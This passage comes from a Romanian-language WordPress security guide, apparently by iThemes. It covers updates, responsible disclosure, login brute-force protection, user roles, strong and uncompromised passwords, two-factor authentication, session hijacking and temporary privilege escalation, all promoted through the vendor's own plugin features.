3. WAF bazat pe cloud - Un WAF bazat pe cloud este de obicei cea mai bună opțiune pentru majoritatea oamenilor. Pro al unui WAF bazat pe cloud este că sunt accesibile, nu necesită gestionarea acestuia. În plus, traficul fiind filtrat înainte de a ajunge pe site-ul dvs., nu va absorbi resursele serverului și nu va încetini site-ul. Cloudflare și Sucuri sunt furnizori populari de firewall-uri bazate pe cloud.

Încheierea

În această secțiune, am aflat de ce este atât de important să alegem gazda potrivită, cum să securizăm comunicarea între site-ul nostru și vizitatorii săi și cum un WAF poate ajuta la blocarea traficului rău intenționat de la lovirea site-ului nostru web.

În secțiunea viitoare, veți afla cele mai bune practici pentru a vă menține securitatea software-ului WordPress.

Secțiunea 5: Securitatea software-ului WordPress

De fiecare dată când instalați un plugin sau o temă nouă, introduceți un nou cod care are potențialul de a fi exploatat de hackeri. În această secțiune, veți afla ce nu trebuie să gestionați WordPress, pluginuri și teme.

1. Instalați software numai din surse de încredere

Instalați pluginuri și teme WordPress numai din surse de încredere. Ar trebui să instalați numai software pe care îl obțineți de la WordPress.org, depozite comerciale bine cunoscute sau direct de la dezvoltatori de renume. Veți dori să evitați versiunea „nulă” a pluginurilor comerciale, deoarece acestea pot conține cod rău intenționat. Nu contează cum blocați site-ul WordPress dacă sunteți cel care instalează malware.

Dacă pluginul sau tema WordPress nu sunt distribuite pe site-ul dezvoltatorului, va trebui să vă faceți diligența înainte de a descărca pluginul. Contactați dezvoltatorii pentru a vedea dacă sunt afiliați în vreun fel site-ului web care își oferă produsul la un preț gratuit sau redus.

2. Eliminați pluginurile și temele neutilizate

A avea pluginuri și teme neutilizate sau inactive pe site-ul dvs. este o greșeală majoră de securitate WordPress. Fiecare bucată de cod de pe site-ul dvs. web este un potențial punct de intrare pentru un hacker.

Este o practică obișnuită pentru dezvoltatori să utilizeze coduri terță parte - cum ar fi bibliotecile JS - în pluginurile și temele lor. Din păcate, dacă bibliotecile nu sunt întreținute corect, pot crea vulnerabilități pe care atacatorii le pot folosi pentru a vă pirata site-ul web.

Notă: Utilizați Auditul site-ului iThemes Sync Pro pentru a verifica paginile dvs. web pentru biblioteci JavaScript front-end cu vulnerabilități de securitate cunoscute.

Dezinstalați și eliminați complet orice pluginuri și teme inutile de pe site-ul dvs. WordPress pentru a limita numărul de puncte de acces și cod executabil de pe site-ul dvs. web.

3. Păstrați-vă software-ul WordPress la zi

Menținerea software-ului actualizat este o parte esențială a oricărei strategii de securitate WordPress. Actualizările nu sunt doar pentru remedierea erorilor și funcții noi. Actualizările pot include, de asemenea, patch-uri de securitate critice. Fără acel patch, vă lăsați telefonul, computerul, serverul, routerul sau site-ul web vulnerabil la atac.

A avea un plugin sau o temă vulnerabilă pentru care este disponibil un patch, dar care nu este aplicat, este vinovatul numărul unu al site-urilor WordPress piratate. Aceasta înseamnă că majoritatea vulnerabilităților sunt exploatate DUPĂ ce a fost lansat un patch pentru vulnerabilitate.

Încălcarea foarte raportată a lui Equifax ar fi putut fi prevenită dacă și-ar fi actualizat software-ul. Pentru încălcarea Equifax, pur și simplu nu a existat nicio scuză.

Ceva la fel de simplu ca actualizarea software-ului dvs. vă poate proteja. Așadar, nu ignorați acele actualizări WordPress - actualizările sunt una dintre cele mai elementare componente ale securității WordPress și a tuturor securității web.

Patch Marți

Patch Tuesday este termenul neoficial pentru a se referi la bug-urile obișnuite și la remedierile de securitate pe care Microsoft le lansează a doua marți din fiecare lună. Este fantastic că Microsoft lansează remedieri de securitate pentru o cadență atât de fiabilă. Patch Tuesday este, de asemenea, ziua în care vulnerabilitățile de securitate pe care patch-urile Microsoft sunt dezvăluite public.

Consultați secțiunea Ce să actualizați și cum să vă automatizați actualizările din Ghidul final pentru securitatea WordPress în 2020 pentru a afla cum să aplicați automat actualizările Patch Tuesday.

Exploatează miercuri

Miercurea următoare Patch Tuesday, este obișnuit să vedem mulți atacatori care exploatează o vulnerabilitate cunoscută anterior pe sisteme învechite și nepatched. Deci, miercurea care a urmat unei Patch Tuesday a fost inventată neoficial ca Exploit Wednesday.

De ce hackerii vizează vulnerabilitățile reparate?

Hackerii vizează vulnerabilitățile reparate, deoarece știu că oamenii nu se actualizează (inclusiv pluginuri și teme de pe site-ul dvs.). Este un standard din industrie să dezvăluie în mod public vulnerabilitățile în ziua în care sunt corecționate. După ce o vulnerabilitate este dezvăluită public, aceasta devine o „vulnerabilitate cunoscută” pentru versiunile învechite și nepatched ale software-ului. Software-ul cu vulnerabilități cunoscute este o țintă ușoară pentru hackeri.

Hackerilor le plac țintele ușoare și a avea software cu vulnerabilități cunoscute este ca și cum ați oferi unui hacker instrucțiuni pas cu pas pentru a pătrunde pe site-ul dvs. WordPress, server, computer sau orice alt dispozitiv conectat la internet.

Dezvăluirea responsabilă

S-ar putea să vă întrebați de ce o vulnerabilitate ar fi dezvăluită dacă le oferă hackerilor un exploit de atac. Ei bine, este foarte obișnuit ca un cercetător în securitate să găsească și să raporteze în mod privat vulnerabilitatea dezvoltatorului de software.

Cu dezvăluirea responsabilă, raportul inițial al cercetătorului este făcut în mod privat dezvoltatorilor companiei care deține software-ul, dar cu acordul că detaliile complete vor fi publicate odată ce un patch a fost pus la dispoziție. Pentru vulnerabilitățile semnificative de securitate, ar putea exista o ușoară întârziere în dezvăluirea vulnerabilității, pentru a oferi mai multor oameni timp de corecție.

Cercetătorul de securitate poate oferi un termen limită pentru ca dezvoltatorul de software să răspundă la raport sau să furnizeze un patch. Dacă acest termen nu este respectat, atunci cercetătorul poate dezvălui în mod public vulnerabilitatea de a pune presiune pe dezvoltator să emită un patch.

Dezvăluirea publică a unei vulnerabilități și introducerea aparentă a unei Zero Zero - un tip de vulnerabilitate care nu are patch și care este exploatată în sălbăticie - poate părea contraproductivă. Dar, este singura pârghie pe care o are un cercetător pentru a-l presiona pe dezvoltator să remedieze vulnerabilitatea.

Dacă un hacker ar descoperi vulnerabilitatea, ar putea folosi în liniște Exploit-ul și ar putea provoca daune utilizatorului final (acesta ești tu), în timp ce dezvoltatorul de software rămâne conținut la lăsarea vulnerabilității fără corecții.

Project Zero de la Google are îndrumări similare atunci când vine vorba de dezvăluirea vulnerabilităților. Ei publică detaliile complete ale vulnerabilității după 90 de zile, indiferent dacă vulnerabilitatea a fost sau nu reparată.

Învățarea actualizării: calea grea

La sfârșitul anului 2018, hackerii profitau activ de un exploit în pluginul WP GDPR Compliance. Exploit-ul a permis utilizatorilor neautorizați - persoane care nu s-au conectat la un site web - să modifice setările de înregistrare a utilizatorului WP și să schimbe rolul implicit de utilizator nou dintr-un abonat în administrator. Din fericire, dezvoltatorii de pluginuri WP GDPR Compliance au acționat rapid și au lansat un patch pentru vulnerabilitate a doua zi după ce a fost dezvăluită public.

Dar, la fel ca în Exploit Wednesday, hackerii au vizat vulnerabilitatea, chiar dacă un patch a fost lansat. În zilele și săptămânile următoare dezvăluirii vulnerabilității conformității WP GDPR, am primit o mulțime de rapoarte conform cărora site-urile WordPress au fost piratate de atacatori care exploatau vulnerabilitatea.

A avea un plugin sau o temă vulnerabilă pentru care este disponibil un patch, dar care nu este aplicat, este vinovatul numărul unu al site-urilor WordPress piratate. ASTA ESTE ATAT DE FRUSTRATIV !!!!! Aceasta înseamnă că majoritatea hacking-urilor WP ar fi putut fi prevenite.

Este deranjant să ne gândim la toți oamenii care au cheltuit o grămadă de bani pentru a-și curăța site-ul web, veniturile pe care le-au pierdut în timp ce site-urile lor nu funcționau și veniturile viitoare pe care le-au pierdut pentru pierderea încrederii clienților lor. Îl face și mai supărător atunci când știi că toată acea angoasă ar fi putut fi prevenită printr-o simplă actualizare.

Funcția de gestionare a versiunilor iThemes Security Pro permite personalizarea și automatizarea actualizărilor dvs. WordPress.

4. Țineți evidența vulnerabilităților WordPress

Menținerea pluginurilor și temelor actualizate nu vă va proteja de fiecare vulnerabilitate WordPress. Unele pluginuri și teme WordPress au fost abandonate de dezvoltatorii care le-au creat.

Din păcate, dacă un plugin sau o temă abandonată are o vulnerabilitate, nu va primi niciodată un patch. Hackerii vor viza site-urile web care utilizează aceste pluginuri vulnerabile acum.

Dacă aveți un plugin abandonat cu o vulnerabilitate cunoscută pe site-ul dvs., le oferiți hackerilor planurile de care au nevoie pentru a prelua site-ul dvs. web. De aceea trebuie să țineți evidența tuturor celor mai recente vulnerabilități.

Este greu să urmăriți fiecare vulnerabilitate WordPress dezvăluită și să comparați această listă cu versiunile de pluginuri și teme pe care le-ați instalat pe site-ul dvs. web. Urmărirea vulnerabilităților este diferența dintre a avea un site securizat față de unul pe care hackerii îl vor exploata cu ușurință.

Vești bune pentru tine! Urmărim și împărtășim fiecare vulnerabilitate dezvăluită în buletinele noastre de vulnerabilități WordPress.

5. Scanați-vă site-ul web pentru a găsi vulnerabilități

O modalitate mai rapidă este de a vă proteja site-ul web împotriva exploatărilor ușoare ale hackerilor este de a utiliza scanări automate pentru a vă verifica site-urile web pentru vulnerabilități cunoscute.

IThemes Security Pro Site Scanner este modul dvs. de a automatiza protecția împotriva vulnerabilităților pe toate site-urile dvs. WordPress. Site Scanner verifică site-ul dvs. pentru vulnerabilități cunoscute și va aplica automat un patch dacă este disponibil.

Site-ul iThemes Security Pro verifică 3 tipuri de vulnerabilități.

1. Vulnerabilități WordPress
2. Vulnerabilități ale pluginului
3. Vulnerabilități tematice

Funcția iThemes Sync Pro Site Audit utilizează puterea Google Lighthouse pentru a vă proteja site-ul web. Auditul site-ului verifică și semnalizează paginile care includ biblioteci front-end JavaScript cu vulnerabilități de securitate cunoscute.

Este o practică obișnuită pentru dezvoltatori să utilizeze coduri terță parte - cum ar fi bibliotecile JS - în pluginurile și temele lor. Din păcate, dacă bibliotecile nu sunt întreținute corect, pot crea vulnerabilități pe care atacatorii le pot folosi pentru a vă pirata site-ul web. Utilizarea componentelor cu vulnerabilități cunoscute se află pe lista OWASP Top 10.

Auditul site-ului mi-a salvat slănina! Am creat un program de audit pentru ca Sync Pro să efectueze audituri automate săptămânale și să-mi trimită prin e-mail rapoartele de audit. Țin totul actualizat și de aceea am fost șocat când am văzut într-unul din auditurile site-ului meu web că foloseam biblioteci JavaScript cu vulnerabilități de securitate cunoscute.

Raportul mi-a indicat o versiune învechită a jQuery din directorul WordPress al site-ului, plin de vulnerabilități cunoscute! Din fericire pentru mine, am văzut în Sync Pro Auditul site-ului meu că foloseam biblioteci JavaScript cu vulnerabilități de securitate cunoscute și că am putut rezolva problema înainte ca site-ul meu să fie piratat.

Încheierea

Gestionarea corectă a software-ului care face ca site-ul dvs. să ruleze, inclusiv plugin-urile WordPress, temele și nucleul WordPress, va parcurge un drum lung în strategia dvs. de securitate WordPress, asigurându-vă site-ul web împotriva atacatorilor online.

Secțiunea 6: Securizarea autentificării dvs. WordPress

Adresa URL de conectare WordPress este aceeași pentru fiecare site WordPress și nu necesită permisiuni speciale pentru acces. Oricine are experiență de lucru cu WordPress știe că adresa URL de conectare se află pe pagina /wp-login.php .

Accesibilitatea paginii de autentificare WordPress o face cea mai atacată - și, probabil, cea mai vulnerabilă - parte a oricărui site web WordPress. Din fericire pentru noi, pluginul iThemes Security Pro face ușor să vă securizați datele de conectare la WordPress.

Să aruncăm o privire asupra instrumentelor din iThemes Security Pro pe care le puteți utiliza pentru a vă securiza datele de conectare WordPress și a le face aproape impenetrabile!

1. Limitați încercările de conectare

Primul pas pentru a vă securiza datele de conectare WordPress este limitarea încercărilor eșuate de conectare. În mod implicit, nu există nimic încorporat în WordPress pentru a limita numărul de încercări eșuate de conectare pe care le poate face cineva. Fără o limită a numărului de încercări de conectare nereușite pe care le poate face un atacator, pot continua să încerce o combinație de nume de utilizator și parole diferite până când găsesc una care funcționează.

Funcția iThemes Security Pro Local Brute Force Protection ține evidența încercărilor de conectare nevalide făcute de o gazdă sau de o adresă IP și de un nume de utilizator. Odată ce un IP sau un nume de utilizator a făcut prea multe încercări consecutive de conectare nevalide, acestea vor fi blocate și vor fi împiedicate să mai facă alte încercări pentru o anumită perioadă de timp.

Pentru a începe să utilizați caracteristica Local Brute Force Protection , activați-o pe pagina principală a paginii de setări iThemes Security Pro.

Setările de protecție locală împotriva forței brute vă permit să setați pragurile pentru blocări.

• Încercări maxime de conectare pe gazdă - numărul de încercări de conectare nevalide pe care un IP le permite înainte ca acesta să fie blocat.
• Încercări maxime de conectare per utilizator - Acesta este numărul de încercări de conectare nevalide pe care un nume de utilizator este permis înainte de a fi blocat.
• Minute pentru a vă aminti conectarea greșită - Acesta este timpul cât o încercare de conectare nevalidă ar trebui să fie luată în considerare pentru un IP sau un nume de utilizator pentru un blocaj.
• Interzicerea automată a utilizatorului „administrator” - Când este activată, oricine folosește numele de utilizator administrator atunci când se conectează primește un blocare automată.

Există câteva lucruri pe care doriți să le aveți în vedere atunci când vă configurați setările de blocare. Doriți să oferiți utilizatorilor încercări de conectare nevalide decât să le dați adrese IP. Să presupunem că site-ul dvs. web este supus unui atac de forță brută, iar atacatorul utilizează numele dvs. de utilizator. Scopul este de a bloca adresa IP a atacatorului și nu numele dvs. de utilizator, astfel încât veți putea să vă conectați și să faceți treaba, chiar și atunci când site-ul dvs. web este atacat.

De asemenea, nu doriți să faceți aceste setări prea stricte setând numărul de încercări de conectare nevalide prea mic și timpul pentru a vă aminti încercările nevalide prea mult. Dacă reduceți numărul de încercări de conectare nevalide pentru gazde / IP-uri la 1 și setați minutele pentru a vă aminti o încercare de conectare greșită la o lună, creșteți drastic probabilitatea de a bloca în mod accidental utilizatorii legitimi.

2. Limitați încercările de autentificare în afara cererii

Există și alte modalități de a vă conecta la WordPress pe lângă utilizarea unui formular de autentificare. Folosind XML-RPC, un atacator poate face sute de nume de utilizator și încercări de parolă într-o singură cerere HTTP. Metoda de amplificare a forței brute permite atacatorilor să facă mii de încercări de nume de utilizator și parolă folosind XML-RPC în doar câteva solicitări HTTP.

Folosind setările WordPress Tweaks ale iThemes Security Pro, puteți bloca mai multe încercări de autentificare pentru fiecare solicitare XML-RPC. Limitarea numărului de încercări de nume de utilizator și parolă la una pentru fiecare solicitare va ajuta mult în asigurarea autentificării dvs. WordPress.

3. Protecția forței brute de rețea

Limitarea încercărilor de conectare se referă la protecția forței brute locale. Protecția locală împotriva forței brute se referă doar la încercările de accesare a site-ului dvs. și interzice utilizatorilor conform regulilor de blocare specificate în setările dvs. de securitate.

Protecția Network Brute Force face acest lucru cu un pas mai departe. Rețeaua este comunitatea iThemes Security și are peste un milion de site-uri web puternice. Dacă un IP este identificat ca încercând să pătrundă în site-uri web din comunitatea de securitate iThemes, IP-ul va fi adăugat la lista interzisă a rețelei Bruce Force.

Odată ce un IP este pe lista interzisă a Forței brute de rețea, IP-ul va fi blocat pe toate site-urile din rețea. Deci, dacă un IP atacă site-ul meu web și este interzis, acesta va fi raportat la iThemes Security Brute Force Network. Raportul meu poate ajuta la interzicerea IP-ului pe întreaga rețea. Îmi place că pot ajuta la securizarea conectării la WordPress a altor persoane doar prin activarea protecției rețelei de securitate iThemes.

Pentru a începe să utilizați Network Force Protection , activați-l în pagina principală a setărilor de securitate.

Apoi introduceți adresa de e-mail, alegeți dacă doriți sau nu să primiți actualizări prin e-mail și apoi faceți clic pe butonul Salvare .

4. Limitați accesul dispozitivului la tabloul de bord WP

Ultimul pas pentru a vă asigura conectarea la WordPress este să limitați accesul la tabloul de bord WordPress la un set de dispozitive. Funcția Dispozitive de încredere iThemes Security Pro identifică dispozitivele pe care dvs. și alți utilizatori le utilizați pentru a vă conecta la site-ul dvs. WordPress. Când un utilizator s-a conectat pe un dispozitiv nerecunoscut, dispozitivele de încredere își pot restricționa capacitățile la nivel de administrator. Aceasta înseamnă că un hacker a reușit să vă ocolească celelalte metode de securitate de conectare - foarte puțin probabil - nu ar avea capacitatea de a aduce modificări rău intenționate site-ului dvs. web.

Pentru a începe să utilizați dispozitive de încredere , activați-le în pagina principală a setărilor de securitate, apoi faceți clic pe butonul Configurare setări .

În setările Dispozitive de încredere, decideți ce utilizatori doriți să utilizați caracteristica și activați apoi restricționarea funcționalităților și a caracteristicilor de protecție împotriva deturnării sesiunii .

După activarea noii setări Dispozitive de încredere, utilizatorii vor primi o notificare în bara de administrare WordPress despre dispozitivele nerecunoscute în așteptare. Dacă dispozitivul dvs. curent nu a fost adăugat la lista de dispozitive de încredere, faceți clic pe linkul Confirmare dispozitiv pentru a trimite e-mailul de autorizare .

Faceți clic pe butonul Confirmare dispozitiv din e-mailul de autentificare nerecunoscută pentru a adăuga dispozitivele dvs. curente la lista Dispozitive de încredere.

Încheierea

Accesibilitatea paginii de autentificare WordPress o face cea mai atacată - și potențial vulnerabilă - parte a oricărui site WordPress. Cu toate acestea, utilizarea pașilor din această secțiune va face ca datele dvs. de conectare la WordPress să fie aproape impenetrabile.

Secțiunea 7: Securizarea utilizatorilor dvs. WordPress

Ori de câte ori vorbim despre securitatea utilizatorului, auzim adesea întrebări precum, ar trebui ca fiecare utilizator WordPress să aibă aceleași cerințe de securitate și cât de multă securitate este prea multă securitate?

Nu-ți face griji. Răspundem la toate aceste întrebări. Dar mai întâi, să vorbim despre diferitele tipuri de utilizatori WordPress.

Care sunt diferitele tipuri de utilizatori WordPress?

Există 5 utilizatori impliciți WordPress diferiți.

1. Administrator
2. Editor
3. Autor
4. Colaborator
5. Abonat

Fiecare utilizator are capacități diferite. Capacitățile dictează ce pot face odată ce au acces la tabloul de bord. Citiți mai multe despre rolurile și permisiunile utilizatorilor WordPress.

Deteriorarea potențială a diferiților utilizatori hackeri WordPress

Înainte de a putea înțelege cum să ne securizăm utilizatorii WordPress, trebuie mai întâi să înțelegem nivelul de amenințare al fiecărui tip de utilizator compromis. Tipul și nivelul daunelor pe care le poate provoca un atacator variază foarte mult în funcție de rolurile și capacitățile utilizatorului pe care îl piratează.

Administrator - Nivel de amenințare ridicat

Utilizatorii administrator au capacitatea de a-și dori orice.

• Creați, eliminați și modificați utilizatori.
• Instalați, eliminați și editați pluginuri și teme.
• Creați, eliminați și editați toate postările și paginile.
• Publică și anulează postări și pagini.
• Adăugați și eliminați conținut media.

Dacă un hacker poate pune mâna pe unul dintre administratorii site-ului dvs., acesta ar putea să vă păstreze site-ul pentru răscumpărare. Așa cum am menționat mai devreme, Ransomware se referă la momentul în care un hacker preia site-ul dvs. web și nu vă va elibera decât dacă le plătiți o taxă puternică.

Editor - Nivel de amenințare ridicat

Editorul gestionează tot conținutul site-ului web. Acești utilizatori au încă destul de multă putere.

• Creați, ștergeți și editați toate postările și paginile.
• Publică și anulează toate postările și paginile.
• Încărcați fișiere media.
• Gestionați toate linkurile.
• Gestionați comentariile.
• Gestionați categoriile.

Dacă un atacator a preluat controlul contului unui editor, acesta ar putea modifica una dintre paginile dvs. pentru a o utiliza într-un atac de phishing. Phishingul este un tip de atac folosit pentru a fura datele utilizatorului, inclusiv acreditările de conectare și numerele cardului de credit.

Phishingul este una dintre cele mai sigure modalități de a obține site-ul dvs. pe lista neagră de Google. În fiecare zi, 10.000 de site-uri intră pe lista de blocuri Google din diferite motive.

Autor - Nivel de amenințare mediu

Autorul a fost conceput pentru a crea și gestiona propriul conținut.

• Creați, ștergeți și editați propriile lor postări și pagini.
• Publică și anulează propriile postări.
• Încărcați fișiere media

Dacă un atacator ar obține controlul asupra contului unui autor, ar putea crea pagini și postări care să trimită vizitatorii site-ului dvs. pe site-uri web dăunătoare.

Contribuitor și abonat - Nivel de amenințare scăzut

Contributor este versiunea simplă a rolului de utilizator Author. Nu au nici o putere de publicare.

• Creați și editați propriile lor postări.
• Ștergeți propriile postări nepublicate.

Abonatul poate citi lucruri pe care ceilalți utilizatori le publică.

În timp ce hackerii cu rol de Colaborator sau Abonat nu pot face modificări dăunătoare, aceștia pot fura orice informații sensibile stocate în contul utilizatorului sau în pagina de profil.

6 sfaturi pentru a vă asigura utilizatorii WordPress

Bine, deci acestea sunt niște lucruri destul de urâte pe care hackerii le pot face site-urilor noastre web. Vestea bună este că majoritatea atacurilor asupra conturilor dvs. de utilizator WordPress pot fi prevenite doar cu puțin efort din partea dvs.

Să aruncăm o privire asupra lucrurilor pe care le puteți face pentru a vă asigura utilizatorii WordPress. Adevărul este că aceste metode de securitate WordPress vor ajuta la securizarea fiecărui tip de utilizator WordPress. Dar, pe măsură ce parcurgem fiecare dintre metode, vă vom anunța ce utilizatori ar trebui să solicitați pentru a utiliza metoda.

1. Oferă oamenilor doar capacitățile de care au nevoie

Cel mai simplu mod în care vă puteți proteja site-ul este doar oferind utilizatorilor capacitățile de care au nevoie și nu nimic mai mult. Dacă singurul lucru pe care cineva îl va face pe site-ul dvs. este să creeze și să editeze propriile postări de blog, nu are nevoie de capacitatea de a edita postările altor persoane.

2. Asigurați utilizatorii WordPress cu parole puternice

Într-o listă compilată de Splash Data, cea mai obișnuită parolă inclusă în toate depozitele de date a fost 123456. Un depozit de date este o bază de date piratată plină cu parole de utilizator aruncate undeva pe internet. Îți poți imagina câte persoane de pe site-ul tău folosesc o parolă slabă dacă 123456 este cea mai comună parolă din depozitele de date?

Folosirea unei parole slabe este ca și cum ai încerca să îți blochezi ușa din față cu o bucată de bandă. Nu a durat niciodată mult timp până când hackerii au forțat brutal să treacă peste o parolă slabă într-un site web. Acum, când hackerii folosesc cardurile grafice pe computer în atacurile lor, timpul necesar pentru a sparge o parolă nu a fost niciodată mai mic.

De exemplu, să aruncăm o privire la o diagramă creată de Terahash, o companie de înaltă performanță care creează parolele. Diagrama lor arată timpul necesar pentru a sparge o parolă folosind un cluster hashstack de 448x RTX 2080s.

În mod implicit, WordPress folosește MD5 pentru a hash parolele utilizatorilor stocate în baza de date WP. Deci, conform acestui grafic, Terahash ar putea sparge o parolă de 8 caractere ... aproape instantaneu. Acest lucru nu este doar super impresionant, ci este și înfricoșător. Vestea bună este că ne putem securiza datele de conectare la WordPress cerând ca utilizatorii noștri de nivel înalt să utilizeze parole puternice.

Funcția de cerință a parolelor iThemes Security Pro vă permite să forțați anumiți utilizatori să utilizeze o parolă puternică. Activați caracteristica Cerințe parolă pe pagina principală a setărilor de securitate, apoi selectați utilizatorii pe care doriți să îi solicitați pentru a utiliza o parolă puternică.

3. Parole compromise refuzate

Potrivit Raportului de investigații privind încălcarea datelor Verizon, peste 70% dintre angajați refolosesc parolele la locul de muncă. Dar cea mai importantă statistică din raport este că 81% din încălcările legate de hacking au folosit parole furate sau slabe.

Hackerii folosesc o formă de forță brută atacată numită atac de dicționar. Un atac de dicționar este o metodă de intrare într-un site web WordPress cu parole utilizate în mod obișnuit, care au apărut în depozitele de baze de date. „Colecția nr. 1? Încălcarea datelor care a fost găzduită pe MEGA a inclus 1.160.253.228 de combinații unice de adrese de e-mail și parole. Adică un miliard cu b. Acest tip de scor va ajuta într-adevăr un atac de dicționar să restrângă cele mai utilizate parole WordPress.

Este o necesitate pentru a împiedica utilizatorii cu capacități la nivel de autor și mai mari să folosească parole compromise pentru a vă securiza datele de conectare la WordPress. De asemenea, s-ar putea să vă gândiți să nu permiteți utilizatorilor dvs. de nivel inferior să utilizeze parole compromise.

Este complet de înțeles și încurajat să creați un cont de client nou cât mai ușor posibil. Cu toate acestea, este posibil ca clientul dvs. să nu știe că parola pe care o utilizează a fost găsită într-un depozit de date. Le-ați oferi clienților un serviciu excelent, alertându-i cu privire la faptul că parola pe care o utilizează a fost compromisă. Dacă folosesc parola respectivă peste tot, le-ați putea salva de la unele bătăi de cap majore pe drum.

Funcția iThemes Security Pro Refuse Compromised Parwords obligă utilizatorii să folosească parole care nu au apărut în nicio încălcare a parolelor urmărite de Have I Been Pwned. Activați caracteristica Cerințe parolă pe pagina principală a setărilor de securitate, apoi selectați utilizatorii pe care doriți să îi împiedicați să utilizați o parolă compromisă.

4. Asigurați utilizatorii WordPress cu autentificare în doi factori

Folosirea autentificărilor cu doi factori este cel mai bun lucru pe care îl puteți face pentru a vă securiza datele de conectare la WordPress. Autentificarea cu doi factori este un proces de verificare a identității unei persoane prin necesitatea a două metode separate de verificare. Google a împărtășit pe blogul său că utilizarea autentificării cu doi factori poate opri 100% din atacurile automate de bot. Îmi plac foarte mult aceste cote.

Funcția de autentificare cu doi factori iThemes Security Pro oferă o mulțime de flexibilitate atunci când implementați 2fa pe site-ul dvs. web. Puteți activa doi factori pentru toți sau unii dintre utilizatorii dvs. și vă puteți forța utilizatorii la nivel înalt să utilizeze 2fa la fiecare autentificare.

Pentru confortul dvs., iThemes Security Pro oferă 2 metode diferite de autentificare cu doi factori.

1. Aplicație mobilă - Metoda aplicației mobile este cea mai sigură metodă de autentificare cu doi factori furnizată de iThemes Security Pro. Această metodă necesită utilizarea unei aplicații mobile gratuite cu doi factori, cum ar fi Authy.
2. E - mail - Metoda de e-mail cu doi factori va trimite coduri sensibile la timp la adresa de e-mail a utilizatorului dvs.
3. Coduri de rezervă - Un set de coduri de utilizare unice care pot fi utilizate pentru a vă conecta în cazul în care metoda primară cu doi factori este pierdută.

5. Securizați utilizatorii WordPress de Session Hijacking

WordPress generează un cookie de sesiune de fiecare dată când vă conectați la site-ul dvs. web. Și să spunem că aveți o extensie de browser care a fost abandonată de dezvoltator și nu mai lansează actualizări de securitate. Din păcate pentru dvs., extensia de browser neglijată are o vulnerabilitate. Vulnerabilitatea permite actorilor răi să vă deturneze cookie-urile din browser, inclusiv cookie-ul de sesiune WordPress menționat anterior. Acest tip de hack este cunoscut sub numele de Session Hijacking . Așadar, un atacator poate exploata vulnerabilitatea extensiei pentru a vă lăsa în evidență datele de conectare și poate începe să facă modificări dăunătoare cu utilizatorul dvs. WordPress.

Ar trebui să aveți o protecție pentru deturnarea sesiunii pentru administratorii și editorii dvs.

Funcția iThemes Security Pro Trusted Devices face din Session Hijacking un lucru din trecut. Dacă dispozitivul unui utilizator se schimbă în timpul unei sesiuni, iThemes Security îl va deconecta automat pentru a preveni orice activitate neautorizată din contul utilizatorului, cum ar fi schimbarea adresei de e-mail a utilizatorului sau încărcarea de pluginuri rău intenționate.

6. Creați un utilizator de asistență universal

De fiecare dată când creați un utilizator nou, adăugați un alt punct de intrare pe care un hacker l-ar putea exploata. Dar, probabil, va fi nevoie să aveți nevoie de ajutor extern pentru site-ul dvs. web, cum ar fi atunci când căutați asistență sau după ce ați angajat un contractor independent. Aveți nevoie de un mod sigur și sigur de a adăuga acces temporar de administrator la site-ul dvs. web.

De exemplu, să presupunem că întâmpinați unele probleme cu unul dintre pluginurile instalate pe site-ul dvs. web. După ce contactează asistența, solicită accesul administratorului la site-ul dvs. web, astfel încât să poată arunca o privire mai atentă. Aceasta pare o cerere perfect rezonabilă și decideți să le acordați acces.

Deci, cum putem oferi cuiva administrator temporar acces la site-ul nostru WordPress?

Acordarea accesului extern la site-ul dvs. web: cele două opțiuni

De obicei, aveți două opțiuni pentru a oferi acces extern la site-ul dvs. web .... și nici unul nu este grozav .

1. Partajați acreditările utilizatorului

Prima și cea mai proastă opțiune este să partajați numele de utilizator și parola utilizatorului dvs. de administrator WordPress.

De ce este teribil să distribuiți acreditările dvs. de administrator

• Securitate redusă - Dacă partajați acreditările utilizatorului dvs., va trebui să dezactivați autentificarea în doi factori pentru a permite persoanei care utilizează acreditările dvs. să se conecteze. Google a distribuit pe blogul său că utilizarea autentificării în doi factori sau a verificării în doi pași poate opri 100% din atacurile automate de bot. Dezactivarea autentificării cu doi factori, chiar și pentru o perioadă scurtă de timp, reduce drastic securitatea site-ului dvs. web.
• Inconvenient - Partajarea acreditărilor dvs. necesită schimbarea parolei. Dacă uitați să vă schimbați parola, există una sau mai multe persoane care au acces de administrator la site-ul dvs. ori de câte ori doresc.

2. Creați un utilizator nou pentru tehnologia de asistență

Deși crearea unui nou utilizator de administrator nou pentru specialistul în asistență este mai bună decât partajarea acreditării de administrator, totuși nu este grozav.

De ce este teribil să creezi un utilizator pentru tehnologia de asistență

• Vulnerabilitate crescută - Crearea unui nou utilizator administrator adaugă un alt punct de intrare care ar putea fi exploatat. Dacă nu aveți o politică de parolă, tehnologia de asistență ar putea alege o parolă slabă, ceea ce face ca datele dvs. de conectare WordPress să fie mai vulnerabile la atac.
• Inconvenient - Trecerea prin procesul de configurare a unui nou utilizator oricând aveți nevoie de ajutor din exterior necesită mult timp. Trebuie să creați noul utilizator și apoi să vă amintiți să îl ștergeți atunci când acesta nu mai are nevoie de acces la site-ul dvs. web. Este o bună practică de securitate WordPress pentru a elimina utilizatorii neutilizați de pe site-ul dvs. web.

Ce este escalada de privilegii?

Funcția iThemes Security Pro Privilege Escalation vă permite să acordați utilizatorului capacități suplimentare temporar.

Privilege Escalation face ușor și sigur crearea unui utilizator universal pe care îl puteți oferi oricărui dezvoltator extern sau tehnicilor de asistență care au nevoie de acces temporar la site-ul dvs. web.

Cu Privilege Escalation, puteți crea un nou utilizator și îl puteți numi Asistență și îi puteți da rolul de utilizator Abonat. Data viitoare când trebuie să oferiți acces temporar la site-ul dvs. web, îl puteți împiedica pe utilizatorul de asistență de la un abonat la un administrator. Vom parcurge cum să facem acest lucru mai târziu în postare, dar mai întâi, să vorbim despre motivul pentru care Privilege Escalation este un mod mai bun de a acorda acces la site-ul dvs. web.

De ce escalada privilegiilor este mai bună

• Ușor - Nu trebuie să creați un utilizator nou de fiecare dată când trebuie să acordați acces la site-ul dvs. web.
• Automat - escaladarea privilegiilor durează doar 24 de ore. După 24 de ore, utilizatorul își pierde automat toate privilegiile suplimentare. Nu trebuie să vă amintiți să eliminați utilizatorii sau să modificați parolele.
• Fără sacrificiu în securitate - Puteți solicita în continuare acestui utilizator de asistență universală să utilizeze metoda de e-mail cu doi factori pentru a vă conecta, ceea ce înseamnă că aveți același nivel de securitate ca și ceilalți utilizatori de administrare. Deoarece rolul real al utilizatorului este un abonat, nu riscați să îl lăsați pe site-ul dvs. web.

Cum se utilizează escalada de privilegii în iThemes Security Pro

